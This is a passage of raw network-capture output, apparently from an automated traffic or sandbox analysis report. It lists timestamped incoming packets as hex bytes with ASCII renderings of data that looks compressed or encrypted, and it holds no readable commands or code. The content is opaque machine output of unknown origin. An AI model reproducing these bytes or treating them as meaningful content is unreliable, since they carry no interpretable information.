c6 Data Ascii: HZ7cP<~!VJV~o8F')Debd[dMfcc""R`"C\|gD.&hxB?qB(%+8O H:P:NI_\|p0<BO\|BL4UWjo2\|7@WI2m<-Uwh'{XNk&(';e'
2023-11-18 09:02:39 UTC	947	IN	Data Raw: b3 1f a9 8f f1 7b 6d 2b 3e f7 c9 20 0e 35 5b 1f 43 52 80 52 0f bf 90 b1 69 0d 24 35 73 0f 0e ea f8 90 0c be 84 9d f0 1a ef c7 fa f3 ec 44 e1 77 54 cb 60 1c b5 41 8f d3 a8 a2 7f c9 06 17 b2 95 1f 39 02 95 07 6f 12 c9 4e 48 4e 43 43 77 e7 91 36 10 6c 84 e4 4d dc c0 9b ba 6e be 8f 83 7b 78 6e 88 2c b1 17 92 67 3f 14 9c ce 35 10 79 a2 25 46 35 c0 a4 05 fb 59 6b f8 77 c1 27 f5 c7 bc 9b de b0 c2 fe 12 ef cb a6 fb b1 de 73 dc f5 93 b0 fc eb cf 61 1b be 6e 4d d3 b1 5f 07 90 e1 79 ce db a4 42 64 23 7f ba 55 7f 03 12 83 1f e3 b8 9d f7 c2 fb 99 5a c6 0a 82 d7 5b 5b 1e 02 e9 c1 1a 06 91 ce cb 7c 06 51 92 53 40 44 f1 98 45 c1 08 f7 cf 8b 70 7c 09 0d cc 76 41 0c 6a 0d ce b1 96 dd 87 4d 7f cd 45 9d 58 34 7c 91 2a 75 43 c1 5c 6b c1 bf 40 fa a6 e7 21 45 df 86 a1 cd 18 da Data Ascii: {m+> 5[CRRi$5sDwT`A9oNHNCCw6lMn{xn,g?5y%F5Ykw'sanM_yBd#UZ[[\|QS@DEp\|vAjMEX4\|*uC\k@!E
2023-11-18 09:02:39 UTC	948	IN	Data Raw: 07 8e 9b 14 58 f4 c9 af 98 e7 8b e1 f9 55 44 3b d6 af 5d ba fe a9 eb 2e 51 ff 6b eb 2e 59 3f f6 1f ca a1 fa 9f 36 ba 83 e3 de 1a a6 f9 f7 c7 86 7f 76 3b 31 0e 97 9b 63 c2 eb 74 34 71 41 2a ef 49 c9 34 e6 b3 eb fa a7 59 ea ff f2 b6 2e ea 3f 32 e3 7f 54 ff ed 96 fa 17 77 55 7f e0 52 f5 5b f6 fb 64 3b 0a 51 ed c7 9b 6a 95 8d 97 fb 41 9b a1 ab ff 9c 94 a0 85 25 99 d2 80 3b 8f fc 07 e7 b0 3c c0 bc 2e c8 89 58 ee a9 78 06 6f a0 49 d0 1e 4d 6f 7e aa 8b e3 0c b1 5f f7 dc 0d 4d 4e 76 76 55 64 d9 54 d1 2d 74 52 17 8e 66 c1 fe 8a b3 e7 41 25 93 fd ca d5 10 86 e5 64 6b 9f 78 ff 8d 41 d6 75 00 85 7f 5b 68 7b 1d 4e be ff 70 38 64 d4 2f 43 53 dc 5a f9 c4 40 88 5a cf c3 17 ac 7f 9b 0c 8b ed dc 66 eb 7b 21 52 8e 1d c2 72 68 d3 4f ee e0 bf ec 9b eb eb b6 29 a9 be af 62 5d Data Ascii: XUD;].Qk.Y?6v;1ct4qA*I4Y.?2TwUR[d;QjA%;<.XxoIMo~_MNvvUdT-tRfA%dkxAu[h{Np8d/CSZ@Zf{!RrhO)b]
2023-11-18 09:02:39 UTC	950	IN	Data Raw: 5f f8 ca 81 c0 ea 1d 13 35 f0 30 fc 33 af ab aa ef 67 6e 26 7e 0e 1c 8f 99 ea ee aa ae ee db 5d dd 5d 5d 5d d5 07 a0 8d ca 88 f4 e6 13 fe b9 11 1a eb d9 a8 74 05 b3 ce 41 f5 f2 b7 60 66 25 ef 91 cf b2 a9 3f c7 21 5f ec d3 ca da e8 c3 e6 65 51 34 1f ba ba 7d 6c 02 1a 44 c7 43 0b 9f a7 17 57 a0 99 1e 19 8c 37 f4 7f e3 b3 d1 0e 52 3f af 32 22 82 37 28 0c da a7 d5 4d 9c 40 67 0f 00 bf 25 ec 23 f9 96 80 77 ed 59 f4 9e 91 97 df 0a 45 b5 a0 43 cd bb 7e e6 fe c2 6e 33 62 56 a8 7d 5a 7f c6 fe a2 e5 bb 1f de 5f 74 52 7f cb 0f d4 bf fa bb 1f af bf 45 ab 7f 06 d6 df 72 9d f5 87 ed af fa fc 9c fa 5b be fd e1 fa 35 fb ee a7 d0 ae 3b 1b b4 fa ab 61 2e cd b2 fb be 31 16 de 1e 10 0c 68 a1 23 ed a2 84 51 3a 94 1e 6d 15 82 27 11 de a1 f1 8b 09 88 64 af 9e 7c 12 87 13 1a 5f Data Ascii: _503gn&~]]]]tA`f%?!_eQ4}lDCW7R?2"7(M@g%#wYEC~n3bV}Z_tREr[5;a.1h#Q:m'd\|_
2023-11-18 09:02:39 UTC	951	IN	Data Raw: 3b 8c d3 dd 43 74 5b ae 86 d1 fd e3 55 9d ee 46 5b 47 ba 17 4f 75 4a f7 9b 46 a2 3b 91 e8 2e bf ca 95 b1 92 0f 9c 52 04 ff 75 45 87 3f 06 78 9f 01 9f 63 45 83 9b 0c f8 0f 70 e6 50 0d 18 f6 16 c1 5a 03 de 09 f8 6b 0c b8 12 f2 f7 18 f0 73 a1 70 fa 10 2f 28 78 e2 8a 55 e1 62 dc 47 f9 42 9e d9 fe 67 e3 fd f3 d2 b9 be c7 b1 0a 8c 2a ab ec 9a 5c 55 32 ae a2 df e1 16 11 82 5d 9e 08 73 35 04 d9 14 fc 30 83 65 eb c1 32 46 a0 cf f6 97 fe 83 49 8e f7 4c a5 c1 38 36 be 45 b4 28 3c a6 52 3c 0f f0 59 1c 25 47 55 81 1c e2 f0 85 86 5f 42 4a f8 fd 25 93 44 e3 f1 ca c0 4c 18 e2 e8 34 73 5d da cb 90 bb cd cc e4 70 64 72 25 14 78 06 2d 90 c4 d1 18 bf cb 7c 71 01 eb 75 27 88 2f 30 c4 c0 70 bb 2e 48 03 c3 f1 28 63 5c d0 b0 5f 66 1d 83 ee 9f 94 fb 20 93 d1 a5 c4 10 ff 92 16 b0 Data Ascii: ;Ct[UF[GOuJF;.RuE?xcEpPZksp/(xUbGBg*\U2]s50e2FIL86E(<R<Y%GU_BJ%DL4s]pdr%x-\|qu'/0p.H(c\_f
2023-11-18 09:02:39 UTC	952	IN	Data Raw: 89 40 07 c8 e8 f2 57 fb 45 9b db aa 70 71 c6 da 3b 8e 36 5e 2d f1 a0 25 44 b1 7b 6b 5a ef dc 1e ca 1f a0 73 1f 7c 17 fe ef e9 4e 5a 79 e4 bb a0 02 fa be a0 32 4b e0 61 77 b3 e8 e0 63 1f 6a e7 31 f0 c2 ef 73 9f 44 6b 10 36 eb f0 8e fa 8d 23 24 fd df c7 3b d0 41 c7 9a 07 69 a1 2e 5d 47 68 65 5f 73 48 a4 70 2a f7 73 0d 33 7a a5 7a 06 f1 3c 8f f0 48 88 ff c5 c0 b4 aa 3c 30 86 4e 90 53 c3 ee aa 59 69 ed f4 a1 5e 3c 2c 76 f0 27 45 4f a0 12 d4 14 a8 c7 54 76 f7 61 cb ed 39 e7 df 8a ff e4 78 39 40 2d 4a 57 50 c3 ca d8 9a 03 0d 31 ec b9 07 6a cf ac d6 1d 12 31 14 f1 60 1e 94 07 e2 ab 1d 86 86 2c ec c3 1b f2 cc 61 6a 6d 6e 9d 11 21 4c d7 83 d9 b7 c1 c4 80 62 77 61 43 f4 02 20 0f d4 07 01 b5 2b 43 5d 04 73 ad e0 26 f6 11 77 85 cc d3 4d b3 e8 9f 68 9a 6e ed c7 45 88 Data Ascii: @WEpq;6^-%D{kZs\|NZy2Kawcj1sDk6#$;Ai.]Ghe_sHp*s3zz<H<0NSYi^<,v'EOTva9x9@-JWP1j1`,ajmn!LbwaC +C]s&wMhnE
2023-11-18 09:02:39 UTC	954	IN	Data Raw: 8b 8d 95 a7 32 08 3c 79 78 07 06 ff 87 e2 0a 86 b2 f1 3d 0a f8 fd 6b f6 f3 78 7c 99 1d ea d9 1e a1 9e ca bd 46 3d c6 79 0f f5 7d 4f b9 dc 6c 53 92 29 8b 80 73 80 ef 21 9a 3e 32 e2 f5 d0 5a 0a 75 25 c6 e2 26 26 ce 9f 01 87 1b a7 3f 83 62 75 66 38 0d 2b b6 89 9f d0 bb 31 f8 3d 6c 37 9e 17 7a 7a ab 53 f9 09 ce 64 2f b3 8a 3e 8f ce f5 97 9c eb 0f 4c 5c 3b 91 eb d4 41 e5 93 8c f7 bb ff fb e3 78 e8 4b ae a1 c1 ac 04 34 bd 17 77 b3 ff a6 28 ee e4 0a 55 84 57 8c 61 f7 0d 39 5c 97 d6 2a 55 2c 52 c1 a9 3a bc 63 15 c8 ba ab 4a 8b df 07 51 74 92 bd 97 13 e7 25 cb c5 e0 0e 3e 1a 8e 08 a0 17 81 b7 17 9a 5d d8 df 92 8d c0 11 61 f1 2d 67 8b e1 fc f7 e4 8a 89 63 a6 76 c7 35 58 95 37 f4 a7 63 fd d9 8c c9 e8 1c 7b c7 fa fb 77 56 7f 7e 27 f5 1f 35 bf 7f fe 77 e4 fa b5 fd a9 Data Ascii: 2<yx=kx\|F=y}OlS)s!>2Zu%&&?buf8+1=l7zzSd/>L\;AxK4w(UWa9\*U,R:cJQt%>]a-gcv5X7c{wV~'5w
2023-11-18 09:02:39 UTC	955	IN	Data Raw: 72 5c 7d 87 c4 cc 9e 3a af 1f fc ec 37 24 5b 98 fd 9b 79 bd 15 65 39 09 bf 44 10 8a ca 28 bb 54 16 d7 33 35 4e 98 f7 b0 fc ad fc 05 86 ed ca 63 a4 7c 1a a9 2c 3e 53 4a e1 86 aa 2c cb 45 57 20 fb 4f 76 f3 ad d3 8d 84 57 81 93 32 f0 6f 2b f9 3c 30 3a 3f e5 e7 9d b1 96 7e db 15 a1 df 0e 54 63 7f 3f 7d cd d4 df a3 2d 78 e5 11 f0 4a 09 af af 09 2f 6c 3c 6a 7a cb 84 5a 7d 40 ca 95 91 07 e4 25 1a a8 31 4f ff 84 c9 dc b7 5a fb cc 1f 5e d5 e3 ac 8f 13 c0 35 0b 7d af 4e e6 c5 db 35 3a 1b 51 9d b0 31 9b b3 51 62 61 a3 3e 02 1b 2b ab b0 f5 77 5d 35 cf 8b 48 f5 de 6e d4 bb a4 22 72 bd 97 ab a9 de 2a 81 1b 73 e3 fd 11 2b 1c cc 37 c5 ce 4f d9 c6 12 7e 07 a1 0e 06 fc 8b 8d 42 4d 42 fa 4e 80 43 cd b3 97 43 a1 4e 18 28 ad d6 19 e8 d6 09 03 af 70 06 e6 00 03 5f 43 bc f9 a1 Data Ascii: r\}:7$[ye9D(T35Nc\|,>SJ,EW OvW2o+<0:?~Tc?}-xJ/l<jzZ}@%1OZ^5}N5:Q1Qba>+w]5Hn"r*s+7O~BMBNCCN(p_C
2023-11-18 09:02:39 UTC	956	IN	Data Raw: 51 e8 6e 68 b2 18 97 f6 69 00 78 c0 3e 7c f8 b0 7e 80 2f 62 85 e1 06 61 9f b2 2c 09 3e 0e 4a f8 38 b9 7b 84 f8 a0 5d 69 dc 27 f0 91 07 f8 00 fb 81 bd f4 54 f6 00 fd 12 c0 fc 75 2c 62 a4 ab 9a 8e 69 32 59 0f ee 86 05 90 c9 fa 0f ea 2d 65 0e e7 28 b1 79 e1 3e c0 6d 03 5f ba 0c cd a9 f4 53 f1 f6 10 09 ea b3 a5 c4 d6 57 97 a0 be fb 93 d5 c7 f6 b7 36 db f0 fd 0f f7 bb db 77 24 dc 2f b7 c7 bd 7f 2c 6e bf 34 f7 e3 8b 12 c3 0f c6 be ef 46 d1 43 9a de 08 fd c0 34 9e 01 d6 c2 d2 f8 fd db b7 3d 51 7d 30 c8 40 d9 68 70 41 60 ef 63 39 36 7e 17 c6 0b 9a 55 06 fb f4 ca e9 f0 4f 2d 3c 28 c9 5d 63 e4 eb 14 c0 bf 1e 14 54 68 cf a0 0d 81 3a e6 62 49 96 0e f9 21 cb 21 18 5e e6 7d a1 f0 aa a1 61 fb 3b 0b c0 eb 20 eb d1 2e a2 cf 33 9e 3c bd 51 c1 12 9a 7b 3b 5f b6 8a c9 08 e4 Data Ascii: Qnhix>\|~/ba,>J8{]i'Tu,bi2Y-e(y>m_SW6w$/,n4FC4=Q}0@hpA`c96~UO-<(]cTh:bI!!^}a; .3<Q{;_
2023-11-18 09:02:39 UTC	958	IN	Data Raw: da 68 85 c9 61 f3 f4 88 34 4f 57 2b 23 9d a7 ad 2f 46 e7 c9 45 8a 19 7b a8 e6 ec a1 ca 61 13 f3 e4 eb 53 ef 2c 77 38 e4 e9 9a 1a 3b 5d 94 c0 8c 2b 5e c6 f9 7a 95 56 34 6c ba 60 7e 98 a0 19 a7 8b cf d5 98 c3 d2 5c 51 0e 64 ca 7b 47 32 4f ab 5f a4 48 5b c0 51 fd 4a 22 54 0b d6 72 4c da 10 e7 00 d4 3f ff 2f 67 f7 32 00 1e 18 fa 8e b3 fb e7 ad 14 2a 08 b3 7b cf 36 e9 fc 39 22 7e 74 a3 34 af 5f c4 d3 df 2b 62 5e b7 c6 cd eb f1 2d b1 f3 9a 9c 7b 39 87 71 af af e3 f7 53 a3 f0 25 3e af 17 e0 5b b1 74 78 5d ef 30 be b5 1e f9 f0 48 e7 b7 6d 4b 2c 1d e6 f4 8d 74 9a 16 6f e1 91 c2 c4 34 25 e6 93 32 c8 0c 00 f9 12 e6 68 57 1b 8f 0b 45 27 a7 44 9e 1c d8 69 d9 ee 2a 62 bd bd f8 14 84 e8 f6 3e 28 76 d8 49 84 5f 7c a7 c8 ba f7 e7 11 a1 25 e6 3d dc f8 7b 2b e2 f3 04 29 94 Data Ascii: ha4OW+#/FE{aS,w8;]+^zV4l`~\Qd{G2O_H[QJ"TrL?/g2{69"~t4_+b^-{9qS%>[tx]0HmK,to4%2hWE'Dib>(vI_\|%={+)
2023-11-18 09:02:39 UTC	959	IN	Data Raw: a9 f5 19 58 b6 63 39 0b cb c8 82 06 95 a5 63 a3 2c 88 d4 c3 21 00 23 de 40 d2 ea e2 79 fd 9a 45 21 2d 73 e1 fd 76 46 f4 53 4d 37 af 5c b3 54 ce 4b 7a f3 34 f4 90 2b 31 9f b8 cd 52 a9 59 2a 33 4b 73 79 09 5b a9 47 9f 8d 76 ee 7b 3a 0d e8 27 8d c7 66 44 b3 b0 96 0a 69 d4 c5 cf 00 56 e6 71 26 36 17 b0 52 8f cf b5 0a 1c 61 15 0e c3 33 03 6a 99 20 d7 d2 54 c9 6a f1 67 8c c1 8a be f9 2f a8 c8 c3 2b 9a 88 15 e1 2b da 22 1c ca 46 de 45 ce fa 03 e0 61 0e 69 ff a1 c2 1f 5a 25 ab b5 9a 6a 6e 4f d0 8d 35 ae e3 35 3e 97 62 11 be 68 4f 60 78 ce b5 d5 e6 30 30 36 85 f1 8b f3 56 51 3b ab 43 5b 8f 94 b1 88 b4 14 a1 e3 fc 49 d3 c5 ee 94 f0 f2 d5 a6 c1 3a 2d f6 e8 9a 0b 0a a3 f5 e6 1a f8 6c 81 bd 53 2f b4 49 2e 78 cd 75 aa c5 12 55 a3 61 3c d0 d1 b5 cb 33 83 47 cf 2e 64 5b Data Ascii: Xc9c,!#@yE!-svFSM7\TKz4+1RY*3Ksy[Gv{:'fDiVq&6Ra3j Tjg/++"FEaiZ%jnO55>bhO`x006VQ;C[I:-lS/I.xuUa<3G.d[
2023-11-18 09:02:39 UTC	960	IN	Data Raw: 4e 4c f3 56 5b a3 44 84 00 af 21 c0 72 37 b9 dd 06 7e 06 6e 47 a6 f1 d4 e7 68 e7 9a a9 1f f4 bb 94 82 22 47 c9 ca e5 80 61 9e 9c 01 7c ab 8d 9d 9f a3 2b 41 a6 df 36 a1 c7 72 a3 7f b9 02 a1 42 fd 95 91 6b 7e 47 29 bb 44 c4 3f 5b 8d f1 cf b4 9e 5b 22 28 9f 95 ed 9d c5 fa 56 c1 89 b2 08 02 f3 ab 3e 90 b2 4b 81 cc 80 de 0a e8 10 fc b7 44 d4 22 0a de 63 89 ad 25 51 3c 25 0c b9 7c 5b a6 ef b0 e7 7e 32 1b 2b fd 90 e5 b4 9c 43 9a 57 33 b1 47 06 13 7b c8 41 9c e6 07 24 b9 74 3a b1 30 81 74 2a 8a a7 57 1e 13 32 a4 a3 8a 80 5a 8a 97 a3 46 7e 0a cd ae c1 93 6a d1 b7 d4 b1 9a 60 f4 0f 3a de 55 72 6d be 20 73 79 42 cd 13 8e d7 14 c9 f8 ca 71 5b 87 77 61 75 80 99 6a ed 8d 10 70 4f ad 9b 09 4f 56 01 7c e8 06 01 47 fb 95 13 94 c6 13 b5 df cf c4 5c 6d 85 14 17 9e 59 a2 17 Data Ascii: NLV[D!r7~nGh"Ga\|+A6rBk~G)D?[["(V>KD"c%Q<%\|[~2+CW3G{A$t:0t*W2ZF~j`:Urm syBq[waujpOOV\|G\mY
2023-11-18 09:02:39 UTC	961	IN	Data Raw: 39 08 de 29 6a c7 78 48 16 ac 1f 87 1f fd 45 29 0a a8 0d 7d 7f f5 8e 0d 57 fa 3d 57 29 f9 5f 2e ad 50 3b b2 6e c8 3b e2 ed 17 b9 d4 1b dd 8e 89 cc b5 f4 06 85 27 57 45 7a 68 fb 94 d1 03 f8 b8 4d 84 bd 48 ff 1d db a6 cb d0 a4 62 8a 3e 99 96 ca d4 0e b5 71 6c 4c 1e 1d ec 92 db 91 ed 2f b2 43 eb ce 7c da 79 b5 01 dc 07 40 ec eb 7f 54 61 89 cf 3a d1 3f 1b b8 5c 2d 5c 45 f5 14 4c 07 3e 9a 3c b9 69 14 0e 2b 4d 4f ef 4e 62 6f 5a c3 52 fd a4 d1 93 b8 64 9f 19 7d de 68 3e 5f 2d 3d 37 e3 ed e5 a1 14 d1 0d 71 f7 d4 ba 16 9e f2 a1 c9 94 3a 0f 29 4b 2f cb 39 11 b6 fb cb 52 94 fc 77 97 d2 f1 db be 57 17 f4 f6 73 99 74 b6 e0 97 de 4f 81 53 fe 64 5c f4 0e 8e 5b 5f 9a c3 58 d5 c4 f6 6b 4f 35 3c 29 18 17 bd d3 b0 40 6e c0 a3 5a e0 9d 3d f0 2d 27 a8 b7 57 2b d1 aa 25 7d bc Data Ascii: 9)jxHE)}W=W)_.P;n;'WEzhMHb>qlL/C\|y@Ta:?\-\EL><i+MONboZRd}h>_-=7q:)K/9RwWstOSd\[_XkO5<)@nZ=-'W+%}
2023-11-18 09:02:39 UTC	977	IN	Data Raw: b6 67 93 e6 4b f8 69 7b db 21 cd 17 83 2f 3b e4 70 a4 e0 32 b3 97 8d f0 c7 93 ed 0b 18 1d 8b 47 67 b3 3e 74 7f 61 b5 b3 58 e8 fd ad 96 a6 a7 69 e9 e8 41 d6 c7 4d e0 0f 2e f6 9a 3d e0 9a f0 5f 3b 8f fc d7 f6 e8 f5 c4 4d ea 62 ab 4e f8 4a c5 17 11 66 21 6a e8 f6 7e 49 87 33 db 86 8e fc 5d d5 25 28 87 67 df a9 56 cb 5a 96 fe 9e 03 97 cc 73 20 68 b1 ea 3c d8 43 44 35 41 2e 22 66 04 b8 87 f0 53 39 8c 30 de 64 ae e4 0c fd 8f c2 8f 7a f3 bf d4 82 19 d0 da 69 2d f8 9e 9a c4 d1 d7 5a 1c 7d ad e0 43 52 f5 04 fd 6e 34 ae c7 f5 dd 46 27 51 a1 f9 3c 36 d2 11 c8 0f cf f4 e6 b7 69 c1 c5 d0 c8 80 16 ac 83 46 22 90 49 45 8c 15 d8 54 bd d5 54 bd 68 8a 3b fd 80 0c 03 b3 8d f5 08 f0 1e fe bf 24 47 08 81 d9 28 64 fb fd 09 62 bf de 89 1b b2 f1 e1 34 2f 46 b2 79 b9 4f 2a e2 f1 Data Ascii: gKi{!/;p2Gg>taXiAM.=_;MbNJf!j~I3]%(gVZs h<CD5A."fS90dzi-Z}CRn4F'Q<6iF"IETTh;$G(db4/FyO*
2023-11-18 09:02:39 UTC	1106	IN	Data Raw: c4 eb 6f 2d f0 17 f9 48 17 56 92 07 59 83 b4 2e 94 1d 17 cc 28 dd 9e 6a 20 e6 4f 10 1c 56 c4 7e 91 c0 79 22 39 d4 e6 02 77 0f a4 e7 0e 2b 7b d5 8d f8 66 3c d2 8f 9e af 40 8f 77 6c ec 05 d6 ef 4e 4e ee 76 41 ae e2 ff c2 60 da 31 9e 77 bd 71 79 90 47 52 7f cf 01 29 5b 3e c9 7b 3f 00 5a 37 3c f8 ad b1 eb 47 b2 4b 11 b8 26 ad 84 06 6d 44 a0 a4 11 03 35 0e 5e f4 3f 49 79 10 25 a2 af e4 ab 1c 1c e5 e5 9b a3 5e 53 08 a8 6f 76 6e 0b 33 a7 01 f5 08 50 ed 51 5e 5b 46 c8 54 46 2e e5 93 4b ed f4 12 90 a2 49 20 25 70 24 0c 1e e6 75 e3 71 a2 0d be 30 ef 4a 9d 2b 4c a5 0c 61 ce df b2 33 fb 57 19 2e d3 ac b6 2f e1 e9 2b bf 62 3e be 11 2f c1 fd 3f 35 dd 6f bd 57 df 82 43 99 69 b4 8c 3f 7a c7 4d bc c1 77 b7 9c 4c 4b ad 6b 8d fa a2 20 30 fa 2c 98 ac c7 be 1e 3a 3f 90 ba 22 Data Ascii: o-HVY.(j OV~y"9w+{f<@wlNNvA`1wqyGR)[>{?Z7<GK&mD5^?Iy%^Sovn3PQ^[FTF.KI %p$uq0J+La3W./+b>/?5oWCi?zMwLKk 0,:?"
2023-11-18 09:02:39 UTC	1122	IN	Data Raw: 39 95 ce 0c b9 12 62 46 a0 7f fd 18 e8 f2 75 6e cd 13 19 d3 c3 5a 8e 7e 8c dc 68 0f 9e 2d 57 8f 73 af 80 4b f1 73 4a 9d 07 32 74 53 06 75 a2 85 cd 55 a7 93 e0 2a e1 82 0c 0d d2 23 14 36 2e 88 73 c0 1d 6a d8 50 a5 3e 50 b7 f8 ed 32 06 9d d5 2f 27 f0 64 1a 5d 5c 16 ca 5b c0 52 05 81 18 70 85 d7 b5 11 21 1d 23 d0 cd 35 70 76 35 98 27 2f f6 6a f4 b0 3a 42 1f cf 4d 5c f6 12 47 8d 42 de e3 7e c4 0b 45 45 64 b2 94 69 0c 19 40 e8 00 28 6d 2a 18 56 ab 2b 39 8a c6 b2 20 2a 0b 8a ab a6 54 02 46 a9 3f f3 99 ef 41 74 ad 2c af 02 fe d5 d7 ad e4 9e 2c 53 e0 5b 2d 29 c5 72 c5 05 50 91 d5 2a b8 83 20 18 48 11 df b9 82 dc 6a 2f 10 21 ff 31 be 48 41 21 da 8c 72 08 99 b9 c1 65 87 62 10 70 bf e2 0a 9f 8b 3c ad 1f 92 57 c9 f0 59 e5 08 97 4c ad 18 ac 22 8a a0 72 0f 3b 37 69 28 Data Ascii: 9bFunZ~h-WsKsJ2tSuU#6.sjP>P2/'d]\[Rp!#5pv5'/j:BM\GB~EEdi@(mV+9 TF?At,,S[-)rP Hj/!1HA!rebp<WYL"r;7i(
2023-11-18 09:02:39 UTC	1138	IN	Data Raw: ef 6b ac fa 0c ee 24 ad 93 d4 16 f8 20 09 53 de 12 50 77 a9 5b b5 05 bf 50 8a 7c 1f 85 84 d6 ae ce 09 7e e1 f4 6d f2 0f 86 1b 9a 0f 13 54 d2 e7 31 84 cf 7b f4 f1 14 fa f4 f6 aa 30 e7 6b b0 c9 15 b5 40 aa 27 fc c6 7a 9d 39 c9 c4 87 5e 0f 8b bc a0 8d 3e 39 12 3e 09 6a 22 cb 67 2f 81 cf de 64 f9 ec 19 76 c8 06 6d 80 a5 a8 c1 d7 a4 44 7a 5b e3 f9 6b 0b 0e 88 fe ce 1e e1 54 37 91 e0 ae 75 84 23 c9 7f b2 b6 80 33 69 d8 30 93 c6 5e 40 f0 91 82 d3 f1 5f 54 13 83 0b 6a e0 5c ba 58 c1 b0 d6 c3 cb c5 c0 09 c0 e7 5f 84 27 34 65 15 b5 af 86 00 cd 98 b2 0b 2a 8e 80 c4 0f e3 c0 12 6c a2 da 23 fa 3b 94 ff 0d a5 81 42 ee 86 75 30 c6 e8 1d 74 7f f1 6d 52 16 dd 06 78 bb 8f f5 1b 35 d4 65 e0 45 6d c1 16 fc 70 e0 ef da 82 ed f4 d7 93 34 5c 6d 39 66 15 39 18 50 d5 f7 83 1d 49 Data Ascii: k$ SPw[P\|~mT1{0k@'z9^>9>j"g/dvmDz[kT7u#3i0^@_Tj\X_'4e*l#;Bu0tmRx5eEmp4\m9f9PI
2023-11-18 09:02:39 UTC	1154	IN	Data Raw: bb 3f 98 ed 8e 26 7c 6f 66 c2 fc 2e e6 76 99 d0 ee 02 b3 dd 9c 84 76 2f 58 c6 19 fd 8b 59 2f 37 61 5c c3 8e 33 ae fa e5 a2 ff b7 5a 49 92 b2 23 a1 f3 54 eb e2 b4 b2 94 26 2d ad 7b cc 7e c6 92 e7 2b 7a 37 1b fc 2e 4a eb 1e 3c 89 60 f5 2d a7 6d f0 ec 3a 22 a3 3d 57 83 b5 0e 0f 2b d6 5d 6c ce 45 fa af 6b 44 9d 4f 0e 51 9d 5f 13 3e 94 6c 8b 87 a7 fc 50 d3 bf c4 7c f7 71 10 e7 09 ff 63 93 ca 46 7f 81 46 13 58 14 37 e3 37 56 c0 da a8 e2 5f 26 65 be e2 55 88 0f c6 5f dd f4 1b a4 bd f9 0d a8 51 2e c6 15 fd 03 2b 08 de 49 a8 0e 51 2b a2 15 bc 18 15 50 73 09 0b c2 ec c7 59 f3 44 18 ec fc a7 98 ce 87 bf 88 7b 6a d2 7a 38 6f 20 bf 31 d0 0c 6d e2 c4 f0 be c0 30 ad ce 2a 6b f7 7b b5 52 43 ce ee 2f 32 64 00 e0 9f dc 1b 4d 19 3d eb c9 fe 39 4b dd 6b e6 4b 94 37 c1 fd bd Data Ascii: ?&\|of.vv/XY/7a\3ZI#T&-{~+z7.J<`-m:"=W+]lEkDOQ_>lP\|qcFFX77V_&eU_Q.+IQ+PsYD{jz8o 1m0*k{RC/2dM=9KkK7
2023-11-18 09:02:39 UTC	1170	IN	Data Raw: db 72 e4 8e ff d6 ba e3 ab 68 c7 df c4 d3 7b f3 f8 3b 7e 14 57 f9 17 ef f8 35 39 bc e3 81 c9 c8 35 77 fc db dd ef 79 f0 21 ef 7e cf 8b 21 e8 f7 fe 64 ee 77 08 3b 0b 2b 50 89 a0 cf d7 37 5c fc 7f df ef df 5f cc fb bd ea c4 f6 fb ba 8b ff 9f f6 7b ae 47 cf 1c 64 ee f7 5c 7d 9a e8 c7 27 06 0e 68 f7 7f de ef 86 27 00 a4 ea cf 83 5d ac 6f ba 88 c6 65 83 0d 7f bb 11 87 8e 4e 11 5e 64 a0 10 f5 04 cc 3c 25 7c 32 6c fa ff 98 f9 ea f6 9c e0 3c 26 66 d2 be df 7f 11 e1 f3 b2 8b 10 9f 21 66 cd 89 ef 77 d1 8f 2b f3 04 f6 3b 30 ef 65 98 32 0e f7 fc d7 e7 13 f1 22 15 dd 2c db 71 2f 39 34 ef c4 fd de 71 61 dc 7e cf 93 7b fd 37 ef 47 90 3f 88 db 9d 14 bf e7 23 0b d2 58 0e a0 8f e1 1a cd c6 ae 07 f0 62 7c d2 ea 0b cd fd 5e 7e 69 fc 7e 27 7f 69 bf 27 07 00 f2 df 3e ed 31 52 Data Ascii: rh{;~W595wy!~!dw;+P7\_{Gd\}'h']oeN^d<%\|2l<&f!fw+;0e2",q/94qa~{7G?#Xb\|^~i~'i'>1R
2023-11-18 09:02:39 UTC	1186	IN	Data Raw: 85 49 5e 9a 4f 76 7b 9d 79 f8 98 a0 42 b6 7f c6 2f c4 27 87 43 db 7a a7 9f 0d 2b 9f 91 95 6f f3 bd f8 48 f5 72 3f 29 a4 49 90 6a df 31 d0 75 c7 69 f5 aa f4 f6 4a 47 cd 06 13 67 33 3c 27 12 79 7b 31 6e 38 9d 82 6c a6 c3 84 de 68 4d 67 47 48 a4 a2 c8 cc 0b a0 1d 1a ab 8d 96 5d cb ca ee 6d a5 0f 1d d3 a5 ee 77 8d ec 9a 3c 9c d4 ab 8c de 8f e8 80 4d 8e 9a 96 07 41 6f f3 59 bf 3f 60 03 33 48 23 e0 cc 1f 55 16 4a 85 1a cb c6 4c 62 75 c4 9f db f1 59 9c 63 03 f5 8d e9 e3 8d 8b 01 d5 5c 83 8b 00 e8 e6 bf 02 97 10 86 90 47 46 04 ac dd 57 a7 28 42 2b 6f 94 94 a6 45 18 1a 1c d4 3d ef a9 a9 13 90 2c 35 e0 c8 7d a7 df ef 0f 1f b9 bd 93 b1 43 e0 78 b9 5d 4b ac 11 7d 95 39 c5 9b 40 9e 2d dd 41 0b d4 e4 cd 3d 85 7b 48 75 e8 08 08 17 c8 e6 8c a7 2a d1 83 23 1e 93 f7 4f 17 Data Ascii: I^Ov{yB/'Cz+oHr?)Ij1uiJGg3<'y{1n8lhMgGH]mw<MAoY?`3H#UJLbuYc\GFW(B+oE=,5}Cx]K}9@-A={Hu*#O
2023-11-18 09:02:39 UTC	1202	IN	Data Raw: 87 35 58 2c 59 66 92 7c d9 4d 55 c3 11 b3 a0 e7 1a 53 5a 6d 75 bd 07 d8 bf 0c b4 b3 f9 18 2d 77 76 9d 53 1e 64 e7 33 09 b2 51 e5 cd 9d 60 80 4d 41 ae dc 36 fa f4 7c 72 de b5 dd 27 e7 dd 6d b7 2b 39 36 64 15 89 c7 17 45 90 cd bc c7 66 6c 0a 72 ad 7c 54 de cf a6 06 68 cc 32 9a 92 72 3f 9e 50 7f 55 c4 2a 1e 29 4e 9c 95 97 b0 d2 89 8c 73 ba dc cf d1 2d b5 64 f0 76 29 54 63 b4 36 16 66 a5 63 ed c4 fc 36 26 63 5e 1b 5a 98 42 66 f4 7a 46 86 f2 71 be 3a 9c 31 8f 32 4e 33 ce 4d 95 50 7a c9 fc 70 90 d6 66 c6 86 9d 7f bb 5d 21 3d de 25 a7 a0 6f 87 cb 89 69 55 32 c8 61 28 55 62 d4 fc d1 75 44 cf 23 e4 e9 c9 49 3d e1 dc e1 b2 7e aa 